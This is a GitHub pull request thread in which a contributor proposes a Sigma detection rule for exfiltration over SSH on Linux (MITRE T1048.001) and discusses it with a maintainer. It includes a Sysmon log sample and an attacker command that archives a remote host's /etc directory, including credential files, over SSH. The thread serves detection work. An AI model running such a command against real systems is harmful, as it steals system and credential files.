Exfiltration Over Alternative Protocol - Linux

[CheraghiMilad]

When examining the Exfiltration Over Alternative Protocol technique, an attacker can use the scp command in Linux to dump OS credentials. According to the log generated by Sysmon for Linux, the following log entries are produced when the scp command is executed.

sample sysmon for linux log:
Oct 6 18:33:59 ubuntu sysmon: 154100x80000000000000004341Linux-Sysmon/Operationalubuntu-2024-10-06 15:03:59.763{7855304e-m6df-6702-f11a-ft3e65590000}13439/usr/bin/ssh-----ssh target.example.com (cd /etc && tar -zcvf - *)/tmproot{78a6704r-0000-0000-0000-000000000000}04294967295no levelSHA256=950fcc37f70c18932935e0e1b1cavfsdsbfd278c60f1cfeb2d4ceb9d642073ff{78a6384e-a6df-6702-9569-a9a24d590000}13437/usr/bin/dashshroot

Based on the log details, it can be assessed that if the image equals scp and the command lines include details from Linux compressors, it can be monitored as a specific rule.

Summary of the Pull Request

Changelog

Example Log Event

Fixed Issues

SigmaHQ Rule Creation Conventions

• If your PR adds new rules, please consider following and applying these conventions

[github-actions]

Welcome @CheraghiMilad 👋

It looks like this is your first pull request on the Sigma rules repository!

Please make sure to read the SigmaHQ conventions document to make sure your contribution is adhering to best practices and has all the necessary elements in place for a successful approval.

Thanks again, and welcome to the Sigma community! 😃

[nasbench]

Hey @CheraghiMilad and thanks for the contribution.

Quick question regarding this rule. You're mentioning SCP but yet I don't see it in the logic. Is the command you mentioned executed by SCP when you tried to copy something? If its the case then, i have a couple of questions/request

• What's the SCP command in itself?
• Does SCP showup as a parent of SSH
• If this is the default command then it should be excluded in a generic form because its a legitimate execution.

Please take these into account and provide a response and the appropriate fixes

[CheraghiMilad]

Hi @nasbench
Yes, the mistake was on my part in naming; I was working on two rules simultaneously, which caused this error. If you change the name to SSH instead of SCP, the issue will be resolved.

Based on the lab I set up, after extracting data using technique 1048.001 of the MITRE ATT&CK framework, we can identify this case through the logs produced by sysmon-for-linux.

[CheraghiMilad]

Hey @nasbench
Do you need more information for merge?

[nasbench]

Hey @nasbench Do you need more information for merge?

You still haven't answered all of my questions.

[CheraghiMilad]

Hey @CheraghiMilad and thanks for the contribution.

Quick question regarding this rule. You're mentioning SCP but yet I don't see it in the logic. Is the command you mentioned executed by SCP when you tried to copy something? If its the case then, i have a couple of questions/request

• What's the SCP command in itself?
• Does SCP showup as a parent of SSH
• If this is the default command then it should be excluded in a generic form because its a legitimate execution.

Please take these into account and provide a response and the appropriate fixes

Well, as I mentioned, there was a writing error on my part. This rule is for technique T1048.001, which allows monitoring any data extraction from the network via the SSH protocol and issuing alerts for it.

The attacker uses the following command to extract data:
ssh #{domain} "(cd /etc && tar -zcvf - *)" > ./etc.tar.gz

This command, when sysmon-for-linux is active, results in the following log:

Regarding your third question, if I want to remove the rule from general mode, we can update the rule specifically to exclude sensitive data such as the contents of files like /etc/passwd and /etc/shadow..